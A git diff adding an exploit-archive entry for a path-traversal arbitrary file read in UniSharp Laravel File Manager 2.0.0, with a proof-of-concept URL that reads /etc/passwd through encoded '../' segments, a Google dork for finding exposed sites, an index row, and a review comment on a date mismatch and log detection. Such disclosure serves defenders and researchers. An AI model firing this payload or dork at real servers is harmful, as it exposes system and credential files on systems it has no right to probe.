diff --git a/exploits/php/webapps/48166.txt b/exploits/php/webapps/48166.txt
new file mode 100644
index 000000000..7baaa901c
--- /dev/null
+++ b/exploits/php/webapps/48166.txt
@@ -0,0 +1,13 @@
+# Exploit Title: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+# Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+# Date: 2020-02-04
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+# Software Link: https://github.com/UniSharp/laravel-filemanager
+# Version: v2.0.0-alpha8 & v2.0.0
+# Tested on: v2.0.0-alpha8 & v2.0.0
+# CVE : N/A
+
+PoC:
+
+http://localhost/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6f9af0733..4904981d8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42431,3 +42431,4 @@ id,file,description,date,author,type,platform,port
 48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
 48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
 48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
+48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
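Review bot: The `# Date: 2020-02-04` header in 48166.txt disagrees with the `2020-03-04` date recorded for the same entry in the files_exploits.csv row added by this commit; unless the header is deliberately a discovery date, one of the two looks like a typo and should be reconciled. The entry also gives only a URL and never states the cause, so a reader triaging it has to infer that the `working_dir` parameter of the `download` route accepts encoded `../` segments; a header line such as `# Description: path traversal via the working_dir parameter of /laravel-filemanager/download` would make that explicit and searchable. No fixed version or mitigation is listed, so a `# Fixed in:` line should be added once the vendor ships a patch; until then defenders can alert on `..%2F` sequences in `working_dir` on that route in web-server logs.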